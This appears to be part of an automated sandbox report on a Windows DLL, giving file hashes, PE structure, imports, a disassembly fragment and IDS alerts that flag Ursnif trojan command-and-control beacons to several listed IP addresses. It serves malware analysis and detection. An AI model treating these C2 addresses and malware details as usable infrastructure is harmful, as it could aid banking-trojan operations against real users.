                  Encrypted:false
                  SSDEEP:12:i9lQatjcv/klMuzeOzKqTl8OGJKirFK2u8clqJ0HGyZe1p8Cjs/d:i9lRcvslMorKqTlte98CugT8Cjs
                  MD5:3BDB3F46E18A7E33AA134A17C1328D52
                  SHA1:1AA067DDC68BC50CA4060CBDC064951B3DA8DEE2
                  SHA-256:4E3D41400F84182D67F86A388AD1344FF4DE28203C4E33AD470BDD9603EAC48B
                  SHA-512:B1374CE6D8501F59D5F677A22AD5CA35AD5E8595BD4F023EC6A39ED7DEC37E0D923FB89DEBA5336C57B0221717EEBB9BA9E072882897556A9D3A5B6EDA7F0D25
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2948222211169545
                  Encrypted:false
                  SSDEEP:24:i9lRXslMotzPWE1trlQZ0HlAwXfRJyvR4+g:0XEpB0ZqXfvyv
                  MD5:10CC3D8270C4631DF824E9EEB4A17CC5
                  SHA1:AF47711BBCA8D1E953095E14343431A7C9B41822
                  SHA-256:D5356EAFE45B35FEFAF78C60947FD796503917DF47407F0559E8D5949517E94F
                  SHA-512:2C43E489A53F50D81A988D3FD2A0F791CAF9E0B1AD989A4EFEC1FF8846D3EDB0305F0A3071F058F3A66D876B37A48203D7C16B9FE5DACB4CC86369C24C5CFAE1
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.1360619400653136
                  Encrypted:false
                  SSDEEP:6:2I2LULJ3Mdy6lGb9K3KhUsA92K3KhUsA9s:P2ILJ3Mdy6kbo3KysY93KysYs
                  MD5:FC7BB6DC0AACD4B36599A1F9745B397D
                  SHA1:84E888EDFB796CBD4D5DDF31231AF48883F52A1B
                  SHA-256:B98CF3C6F69B7662A6D4EBF2BB231675EDFEBD4215B493DEEFCD536A5A61FB75
                  SHA-512:421E5DF77357C7B44BEAC6A90E782EDBF63DBE688F69F082034B71309876CAFB8245CD66DC5521322208FD782009B25328C75C23B28AB92AA1BB31CDE7339BE4
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2952051098609474
                  Encrypted:false
                  SSDEEP:24:i9lRFJN9EOprdr4eS1gFVjvCxg50ab1lzEci+O+:0FJN9EsrdUeUA5vCubPzEn+O
                  MD5:2DDB8F94F09540590A3B8495E2446D1C
                  SHA1:126B4CFB7992C8103735A340F2F1144BC013E53E
                  SHA-256:7245ED81E48DA5815C073F8F81514DA4A8668257483DEA76F6ADF703700F0D3E
                  SHA-512:13BEA98F4AE3FB68B2090DE31E3E5A4A3F90E828B173C0F27C83E43A8F807525BCA409AA869C1DD37CFD3A7D674F63B92EE197B305FC842CAB2B8EE71D113AFA
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2950702279734174
                  Encrypted:false
                  SSDEEP:24:i9lRxNslR0UP9juPwY4BlV6UlU+nfVJA:0xNER0UJzHDVPl
                  MD5:9C760E8F60D9C3F2FC382CCD9C4FF5C7
                  SHA1:2C84F4604B594C2D3B563C2FC550A7FA142880C6
                  SHA-256:7BCE2AA0BC58BD72251E472952A74A701684ECBFB5896662169242CE043EDD94
                  SHA-512:FC803095E1BBA072BF58AC9037BFE7DCE0FB005EEB2BCFDF3C8A0EE054C01B00CC0468E40EDFF7BA0B1164B269B94CDB618E058EB1DCA4E28DEEF896520949F0
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2895015418785815
                  Encrypted:false
                  SSDEEP:24:i9lxzjEuocPlg+yCz90YHdHvOBlr3yflBEh8H8Ea:0zjEDcyCzWA2BljyNy6H8E
                  MD5:9004A72D7B88DD4B9AAB8E0D603E9F28
                  SHA1:F487358ADE51F3EA1E31B2DEAB05D1B562DAC2F3
                  SHA-256:E7157C1C13633D1D3AE70F0B0FF1CEFA18A17632A3FC88E3FB8C775B0AB700AA
                  SHA-512:3933A94AD1A55856C30BAA72AE264112C235012B057BFCBBBEBEC663BECED18726E39F00C0090B19371E09D02CFD5D6FBF011EAA06AAF03BD659DA2023204ADA
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.13572565008702214
                  Encrypted:false
                  SSDEEP:6:qve/3/t/me/3Ua/K5/3Ua/K5/3Ua/KYt:qvKP5mK3UWs3UWs3UWd
                  MD5:30B608A3C13E302E067AC7E41980D334
                  SHA1:85578E2159228DC796D1B23AC3579142F0230ADD
                  SHA-256:DEC0D7145BF2AA60698C336481FB5AE86CC253C1260DB76722728C1C5C20D318
                  SHA-512:44B8F91BD585A304FC91F47311163D692EDA80E97B33F42CE3E1395022532CFBB38611C56339132376C4D1C3B853CADD735FBB50F614D897683A7B23EE7EAF3E
                  Malicious:false
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3440
                  Entropy (8bit):3.1928448127259985
                  Encrypted:false
                  SSDEEP:48:Hdi0PgI0C9GrIorAsASFrdi0PgI0h683GrIorAczH:tPge9SLAJOPgz3SLAG
                  MD5:2254ED212BC40655A785732E9266C7AB
                  SHA1:FF74B0B5956756CFDB1DE654D2CD5BDD390CED19
                  SHA-256:6657314B16C5227AF1CD6489B14EED18BF319493C2AB55E24F19ACC94B57C58A
                  SHA-512:F6A2287D474B3C4F222E8A262CB5D9221A64F0D720D21EEBEC6FCB31F46BBCA56814673F934362474ECD6FDF944DAD6284B3A2F901438389EBDA678BF5A02957
                  Malicious:false
                  Preview:...................................FL..................F.@.. .....@.>...*..#......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L.5T.~....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.5T.~..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J5T.~.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............:|.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                  File type:MS-DOS executable, MZ for MS-DOS
                  Entropy (8bit):6.163451632114402
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • VXD Driver (31/22) 0.00%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Wartless_v8.8.9.0.dll
                  File size:442368
                  MD5:3b4e9e88c0dd6e82ecc65e2d219544c6
                  SHA1:5d4f4d60773ed452188c8a099b5972edbbb03f90
                  SHA256:4d4bedbc795e2dd4fe929b6dc57bfc314165795e25c362959fbabc59c0a60d80
                  SHA512:451eb0e4b91a7b37ecf4abe3589e1c0033ae248d0bdec0ecfd8bfec005d010b9400447bcb3707849b40d4f60e3cb5167541d5a779e6b75ca6ab38a37e18968d7
                  SSDEEP:12288:YudQDXhMYGldQDXhMYGldQDXhMYGAGj7:YKyXhPSyXhPSyXhP
                  File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....6.........." .......P...............................@.......(...............................4..R..
                  Icon Hash:74f0e4ecccdce0e4
                  Entrypoint:0x10002022
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x10000000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  DLL Characteristics:
                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:406900a52ebbaff2418df7f831674972
                  Instruction
                  mov ecx, 00001254h
                  push 00000000h
                  call dword ptr [100081A8h]
                  mov ebx, eax
                  push 00000000h
                  push 00000000h
                  call dword ptr [1000850Ch]
                  mov ecx, eax
                  call dword ptr [10008264h]
                  mov ecx, eax
                  mov ebx, eax
                  push 10001083h
                  ret
                  push eax
                  cmp dword ptr [esp+08h], 01h
                  push eax
                  jc 00007FDA44C81136h
                  mov byte ptr [edi+01h], al
                  adc byte ptr [ebx-761B71BCh], cl
                  push ebp
                  cmp ecx, 08h
                  mov dword ptr [10028B1Ch], eax
                  mov esi, dword ptr [ebp+0Ch]
                  pushfd
                  add eax, esi
                  mov eax, ecx
                  sub esp, 00000328h
                  xor eax, eax
                  push eax
                  shr ecx, 02h
                  jbe 00007FDA44C81136h
                  lea eax, dword ptr [edx-02h]
                  call 00007FDA44C86CF6h
                  mov word ptr [ebp+68h], fs
                  add al, cl
                  shr ecx, 02h
                  lea eax, dword ptr [edx-02h]
                  nop
                  call 00007FDA44C82BF4h
                  inc esp
                  jmp 00007FDA44C81135h
                  pop ecx
                  shr ecx, 02h
                  call 00007FDA44C881DDh
                  js 00007FDA44C81136h
                  je 00007FDA44C81136h
                  mov ecx, dword ptr [esp+10h]
                  mov dword ptr [ebp+000002A4h], eax
                  mov eax, dword ptr [eax-04h]
                  push edi
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFD0h
                  push esi
                  push edi
                  push 10064BB8h
                  call dword ptr [10008410h]
                  mov dword ptr [ebp-08h], eax
                  push dword ptr [00000000h]
                  Name                                  Virtual Address  Virtual Size  Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x34ed           0x52          .text
                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x87c0           0xf0          .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6b000          0x7428        .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x73000          0x4f8         .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IAT             0x7d40           0xa80         .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                  Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                  .text   0x1000           0x342d        0x3600    False     0.612123842593   data       6.71334607323  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata  0x5000           0x38b0        0x3a00    False     0.380051185345   data       4.72338733462  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data   0x9000           0x61f6b       0x5c400   False     0.720091780996   data       5.98043782395  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc   0x6b000          0x7428        0x7600    False     0.308295815678   data       3.21705781853  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc  0x73000          0x4f8         0x600     False     0.724609375      data       5.84430272802  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  Name        RVA      Size    Type  Language  Country
                  RT_STRING   0x6b0d0  0x32    data  English   United States
                  RT_VERSION  0x6b104  0x6f68  data  English   United States
                  RT_VERSION  0x7206c  0x3bc   data  English   United States
                  DLL           Import
                  advapi32.dll  RegCreateKeyA, RegOpenKeyA, RegEnumKeyA, RegSetValueExA, RegSetValueA, SetThreadToken, GetFileSecurityA, RegOpenKeyExA, RegCloseKey, RegCreateKeyExA, RegDeleteKeyA, RegQueryValueExA, RevertToSelf, SetFileSecurityA, RegDeleteValueA, RegQueryValueA, OpenThreadToken
                  comdlg32.dll  GetFileTitleA
                  crypt32.dll   CryptQueryObject, CertGetNameStringA, CertFreeCertificateContext
                  gdi32.dll     SetMapMode, CreateDIBPatternBrushPt, AngleArc, GetWorldTransform, CreateEnhMetaFileA, CreateBrushIndirect, ModifyWorldTransform, StrokePath, CreatePatternBrush, LineTo, SetRectRgn, SetColorAdjustment, PlgBlt, SetPixelV, OffsetClipRgn, GetCharacterPlacementA, GetMiterLimit, GdiComment, DPtoLP, GetFontData, GetColorAdjustment, SelectPalette, EnumFontFamiliesExA, CreatePolygonRgn, EnumMetaFile, StretchDIBits, CreateFontA, FlattenPath, GetBkColor, ExtFloodFill, ScaleViewportExtEx, OffsetViewportOrgEx, CreateICA, CreateHalftonePalette, SetTextColor, CreatePen, SetMapperFlags, GetCharWidthA, EnumObjects, PlayMetaFileRecord, GetTextCharacterExtra, SetWindowOrgEx, CreateCompatibleDC, CreateRectRgnIndirect, GetObjectA, CreatePolyPolygonRgn, GetClipRgn, Pie, GetNearestColor, GetPaletteEntries, SetTextCharacterExtra, CreateHatchBrush, CombineRgn, SetAbortProc, Arc, GetCharWidthFloatA, SetBkColor, Rectangle, CloseMetaFile, GetDeviceCaps, EndPage, SetMiterLimit, PolyBezier, GetAspectRatioFilterEx, GetClipBox, SelectClipPath, GetOutlineTextMetricsA, ExcludeClipRect, SelectObject, EndDoc, GetCurrentObject, GetRgnBox, SetWindowExtEx, SetArcDirection, ExtCreatePen, GetNearestPaletteIndex, SetBoundsRect, TextOutA, CreateMetaFileA, GetWindowOrgEx, PtInRegion, FrameRgn, GetPixel, PlayEnhMetaFile, BitBlt, GetTextAlign, MaskBlt, CreateEllipticRgn, GetPolyFillMode, CreateSolidBrush, SetBitmapBits, GetBkMode, GetViewportExtEx, FloodFill, GetBoundsRect, FillPath, GetTextMetricsA, GetROP2, ExtEscape, CreateCompatibleBitmap, EndPath, SetPixel, FillRgn, SetViewportExtEx, SetWorldTransform, GetTextExtentPoint32A, SaveDC, PolyPolyline, ResetDCA, WidenPath, GetMapMode, InvertRgn, PatBlt, PolyBezierTo, LPtoDP, CreateRoundRectRgn, CreateEllipticRgnIndirect, Ellipse, PaintRgn, PathToRegion, UpdateColors, MoveToEx, RectVisible, StartPage, StrokeAndFillPath, GetStockObject, IntersectClipRect, CreateDCA, SetTextAlign, EqualRgn, UnrealizeObject, GetCurrentPositionEx, GetGraphicsMode, RectInRegion, GetPath, CreateFontIndirectA, GetRegionData, ExtSelectClipRgn, StretchBlt, GetCharABCWidthsFloatA, RoundRect, CreatePenIndirect, PtVisible, RealizePalette, SetROP2, DeleteObject, ResizePalette, GetWindowExtEx, SetBitmapDimensionEx, SetBrushOrgEx, GetGlyphOutlineA, OffsetWindowOrgEx, GetBitmapBits, CloseEnhMetaFile, SetGraphicsMode, PolyDraw, RestoreDC, AbortPath, CreateBitmap, CreateRectRgn, SelectClipRgn, GetCharABCWidthsA, CloseFigure, Escape, GetArcDirection, GetStretchBltMode, ArcTo, PolyPolygon, GetDCOrgEx, CreateBitmapIndirect, CreateDiscardableBitmap, ExtCreateRegion, GetTextColor, SetViewportOrgEx, ScaleWindowExtEx, GetObjectType, SetTextJustification, ExtTextOutA, SetStretchBltMode, SetPolyFillMode, StartDocA, AnimatePalette, GetViewportOrgEx, SetBkMode, OffsetRgn, Polygon, GetBitmapDimensionEx, DrawEscape, GetBrushOrgEx, PlayMetaFile, CreatePalette, BeginPath, GetFontLanguageInfo, SetPaletteEntries, Polyline, PolylineTo, Chord, CopyMetaFileA, GetTextFaceA, DeleteDC, AbortDoc
                  kernel32.dll  lstrlenA, GetStringTypeW, LCMapStringA, CreateEventA, GlobalReAlloc, ReadFile, LockFile, DuplicateHandle, GetLastError, lstrcmpA, SetStdHandle, HeapAlloc, GetStartupInfoA, VirtualAlloc, LeaveCriticalSection, GetFileTime, SetFileTime, IsBadReadPtr, EnterCriticalSection, MoveFileA, IsValidCodePage, UnlockFile, GetVolumeInformationA, FileTimeToSystemTime, GetEnvironmentStrings, GlobalUnlock, SetFilePointer, GetPrivateProfileStringA, GetStdHandle, GetEnvironmentStringsW, GlobalFree, VirtualProtect, LoadResource, UnmapViewOfFile, MulDiv, OpenFileMappingA, GetStringTypeExA, HeapReAlloc, TlsGetValue, GetConsoleMode, GetFileAttributesA, SetUnhandledExceptionFilter, LoadLibraryW, SystemTimeToFileTime, FreeResource, CompareStringA, GlobalHandle, GetModuleHandleA, VirtualQuery, SizeofResource, SetErrorMode, GetTickCount, LCMapStringW, lstrlenW, WaitForSingleObject, GetThreadPriority, GetModuleHandleW, GetCurrentProcess, CreateThread, FindClose, IsDebuggerPresent, GetCPInfo, MapViewOfFile, HeapDestroy, FreeEnvironmentStringsA, GetConsoleOutputCP, GetConsoleCP, GetThreadLocale, GetVersionExA, CloseHandle, RaiseException, SuspendThread, CopyFileA, GetCurrentThreadId, FindResourceExA, InterlockedDecrement, InterlockedIncrement, GlobalSize, GetStringTypeA, InterlockedExchange, LocalAlloc, GetOEMCP, GlobalGetAtomNameA, LoadLibraryA, FindResourceA, GetAtomNameA, OutputDebugStringA, GlobalAlloc, GlobalDeleteAtom, TlsSetValue, GetACP, WriteConsoleW, WriteConsoleA, LocalFileTimeToFileTime, LockResource, lstrcmpW, FlushFileBuffers, OpenEventA, FindFirstFileA, GlobalAddAtomA, SetEvent, WideCharToMultiByte, FreeLibrary, GetCurrentProcessId, ResumeThread, GetModuleFileNameA, QueryPerformanceCounter, LocalFree, MultiByteToWideChar, GetPrivateProfileIntA, GetHandleInformation, GetProfileIntA, EnumResourceLanguagesA, GetFullPathNameA, GetCurrentThread, OutputDebugStringW, GetFileType, GlobalFindAtomA, HeapCreate, GetProcAddress, GlobalFlags, SetEnvironmentVariableA, GetModuleFileNameW, HeapFree, SetHandleCount, WritePrivateProfileStringA, GetShortPathNameA, GetTempFileNameA, lstrcmpiA, ExitProcess, FormatMessageA, HeapValidate, SetFileAttributesA, LocalReAlloc, GetFileSize, CompareStringW, DeleteCriticalSection, GetLocaleInfoA, TlsAlloc, GetCommandLineA, GetCurrentDirectoryA, WriteFile, GetVersion, CreateFileA, FreeEnvironmentStringsW, GlobalLock, UnhandledExceptionFilter, SetLastError, GetWindowsDirectoryA, GetProcessHeap, FileTimeToLocalFileTime, CreateFileMappingA, RtlUnwind, TlsFree, DebugBreak, GetTimeZoneInformation, TerminateProcess, SetThreadPriority, SetEndOfFile, VirtualFree, ConvertDefaultLocale, DeleteFileA, GetDiskFreeSpaceA, GetSystemInfo, GetDateFormatA, InitializeCriticalSection, VirtualProtectEx, ExitThread
                  ole32.dll     StringFromCLSID, ReadClassStg, CreateBindCtx, CLSIDFromString, OleRegGetUserType, OleRun, OleDuplicateData, CoMarshalInterface, CLSIDFromProgID, CoTaskMemFree, CoDisconnectObject, WriteFmtUserTypeStg, CoTreatAsClass, CoReleaseMarshalData, SetConvertStg, CoCreateInstance, CoRevokeClassObject, CoTaskMemAlloc, WriteClassStg, CoRegisterClassObject, ReadFmtUserTypeStg, CoUnmarshalInterface, StringFromGUID2, ReleaseStgMedium, CreateStreamOnHGlobal
                  rpcrt4.dll    NdrClientCall2, RpcMgmtIsServerListening, RpcBindingFree, RpcBindingSetAuthInfoA, RpcStringFreeA, RpcStringBindingComposeA, RpcBindingFromStringBindingA
                  shell32.dll   ExtractIconA, DragFinish, SHGetFileInfoA, DragAcceptFiles, DragQueryFileA
                  shlwapi.dll   PathFindExtensionA, PathIsUNCA, PathRemoveExtensionA, SHDeleteKeyA, PathFindFileNameA, PathStripToRootA
                  user32.dll    SystemParametersInfoA, GetWindowLongA, GetSystemMetrics, ExcludeUpdateRgn, IsDlgButtonChecked, SetMenuItemInfoA, SetDlgItemInt, CheckMenuItem, MoveWindow, DrawFrameControl, SetWindowLongA, GetAsyncKeyState, OpenIcon, MessageBoxA, IsWindow, WinHelpA, SendDlgItemMessageA, GetScrollInfo, SetScrollPos, GetWindowContextHelpId, InflateRect, GetMenuItemCount, DrawTextA, DestroyIcon, ChildWindowFromPoint, EndDeferWindowPos, DlgDirListA, GetClassNameA, GetMenuContextHelpId, CheckMenuRadioItem, ModifyMenuA, GetMenuState, IsWindowVisible, GetMenuItemInfoA, MsgWaitForMultipleObjects, DeferWindowPos, GetNextDlgGroupItem, SetRectEmpty, CreateCaret, UnregisterClassA, DlgDirListComboBoxA, SetWindowRgn, WindowFromDC, ChangeClipboardChain, ChildWindowFromPointEx, DrawFocusRect, IsWindowEnabled, DeleteMenu, SetMenuDefaultItem, LoadMenuIndirectA, GetForegroundWindow, FindWindowA, OffsetRect, ShowCaret, ReleaseDC, IsMenu, TrackPopupMenuEx, LoadIconA, FindWindowExA, LoadCursorA, GetSubMenu, ScrollWindowEx, UnionRect, CheckDlgButton, DrawCaption, CloseWindow, SetFocus, GetMessageW, GetWindowRgn, DrawMenuBar, ClientToScreen, SubtractRect, OpenClipboard, GetLastActivePopup, BeginDeferWindowPos, DispatchMessageW, GetCaretPos, ScrollDC, GetTopWindow, EndDialog, SetTimer, ArrangeIconicWindows, TranslateAcceleratorA, ScreenToClient, GetDesktopWindow, EqualRect, BringWindowToTop, SetWindowsHookExA, GetWindowRect, ShowScrollBar, SetWindowPlacement, CallNextHookEx, HiliteMenuItem, SetCursor, SetMenuItemBitmaps, FlashWindow, GetClipboardFormatNameA, WindowFromPoint, CreatePopupMenu, TranslateMessage, GetDlgItemTextA, GetClipboardViewer, LoadAcceleratorsA, IsIconic, InvalidateRgn, GetDialogBaseUnits, FillRect, GetClipboardOwner, GetClientRect, GetNextDlgTabItem, SetParent, EndPaint, IsChild, GetDlgCtrlID, RegisterWindowMessageA, GetCursorPos, SetWindowTextA, EnableWindow, SendNotifyMessageA, IsWindowUnicode, GetFocus, GetDCEx, DlgDirSelectComboBoxExA, CheckRadioButton, SetScrollInfo, LockWindowUpdate, UnpackDDElParam, RegisterClassA, SetScrollRange, SetMenuContextHelpId, DispatchMessageA, KillTimer, DragDetect, DestroyMenu, PostQuitMessage, ValidateRect, GetClassLongA, GetUpdateRgn, GetWindowPlacement, CharUpperA, GetMessageA, GetKeyNameTextA, GrayStringA, GetWindowThreadProcessId, ShowOwnedPopups, SendMessageA, IntersectRect, EnableMenuItem, UnhookWindowsHookEx, SetDlgItemTextA, DlgDirSelectExA, DrawStateA, SetCapture, RemovePropA, SetWindowPos, GetScrollRange, GetUpdateRect, GetCapture, SetActiveWindow, ShowWindow, InvertRect, GetActiveWindow, HideCaret, GetClassInfoExA, ValidateRgn, GetWindowTextLengthA, DefWindowProcA, SetPropA, CreateWindowExA, UpdateWindow, PtInRect, DrawTextExA, MapWindowPoints, GetMessageTime, GetPropA, AppendMenuA, GetTabbedTextExtentA, GetWindowTextA, GetParent, EnableScrollBar, BeginPaint, PostMessageA, GetMenuDefaultItem, GetSystemMenu, DrawEdge, SetWindowContextHelpId, SetCaretPos, CopyRect, GetSysColor, GetScrollPos, SetForegroundWindow, GetWindowDC, GetMenuItemID, InvalidateRect, ReuseDDElParam, LoadMenuA, LoadBitmapA, CreateMenu, IsDialogMessageA, RedrawWindow, GetMenuStringA, AdjustWindowRectEx, IsRectEmpty, MapVirtualKeyA, IsZoomed, TrackPopupMenu, ReleaseCapture, SetMenu, SetRect, TabbedTextOutA, PostThreadMessageA, DrawIcon, GetKeyState, SetClipboardViewer, DestroyWindow, GetDlgItemInt, GetDC, CreateDialogIndirectParamA, GetMessagePos, ScrollWindow, GetOpenClipboardWindow, GetMenuCheckMarkDimensions, FrameRect, GetWindow, RemoveMenu
                  winspool.drv  OpenPrinterA, DocumentPropertiesA, ClosePrinter
                  Name               Ordinal  Address
                  DllRegisterServer  1        0x10003015
                  Description       Data
                  InternalName      Vapidism
                  PrivateBuild      Carbolate
                  OriginalFilename  Wartless
                  LaparonephrectomyDiurnation
                  OvismCremasteric
                  LuteinizationSulphohydrate
                  CoincidentlyAstrodiagnosis
                  UnfoolableBalteus
                  CincherJejunitis
                  AntitherminSaccharomycetaceous
                  WaddlingBoomage
                  UnunderstandableSubsultus
                  ChoristateOii
                  HoaryAnnoying
                  TorselMoodishly
                  ThorninessPolyphylogeny
                  PigflowerEruditionist
                  NeoholmiaRuinable
                  NitrostarchHemilethargy
                  SomersetianRashful
                  HyperadenosisPlaintiveness
                  RingbonedLepisosteidae
                  FisticufferyDiphtherotoxin
                  OxytocousDowdyish
                  UncradledScatula
                  TachygrapherEnthraller
                  AaliiRecedent
                  JougDromaeus
                  PalpitationPhysostigmine
                  FautererBoomage
                  LuminantMisniac
                  ChilkatDicephalism
                  UnderdrawersOscurrantist
                  SeropuriformCongressist
                  RhombozoaFlauntily
                  FlannelmouthQuinocarbonium
                  TechnicistCibory
                  CaiquejeeCheremissian
                  ClitchDefoliage
                  SkatosineReascensional
                  ManlinessPaunchful
                  EscaperPyrostat
                  TarboyTetartoid
                  UvulitisNeurocentrum
                  TurgoidFennoman
                  MarssoniaDemonry
                  SurbasedLagarto
                  OverfondlyCerous
                  PsychoneurologicalEntozoology
                  CorylaceaeSolidly
                  UnlustilyLoveflower
                  LaparocolectomyTataric
                  PeriplegmaticZein
                  ArchigonyMowrah
                  ProstatorrhoeaAsynergy
                  PaedotrophicAmbagious
                  OcclusometerBeray
                  FileVersion: 8, 8, 9, 0
                  FileDescription: Paratitles
                  CompanyName: Guanaco
                  Translation: 0x0409 0x04e4
                  Language of compilation system | Country where language is spoken | Map
                  English | United States |
                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  01/21/22-07:52:33.154789 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49755 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:52:33.156999 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:52:33.200899 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49756 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:52:33.224863 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:52:33.373173 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49759 | 80 | 192.168.2.3 | 31.41.46.120
                  01/21/22-07:53:19.287818 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49798 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:53:19.287818 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49798 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:53:20.714209 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49801 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:53:20.714209 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49801 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:53:20.722322 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49802 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:53:21.753692 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49804 | 80 | 192.168.2.3 | 192.64.119.233
                  01/21/22-07:53:22.248539 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49812 | 80 | 192.168.2.3 | 198.54.117.218
                  01/21/22-07:53:22.248539 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49812 | 80 | 192.168.2.3 | 198.54.117.218
                  01/21/22-07:53:22.270560 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49814 | 80 | 192.168.2.3 | 198.54.117.211
                  01/21/22-07:53:22.431092 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49813 | 80 | 192.168.2.3 | 198.54.117.211
                  01/21/22-07:53:22.757134 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49815 | 80 | 192.168.2.3 | 198.54.117.211
                  01/21/22-07:53:24.126191 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49819 | 80 | 192.168.2.3 | 198.54.117.210
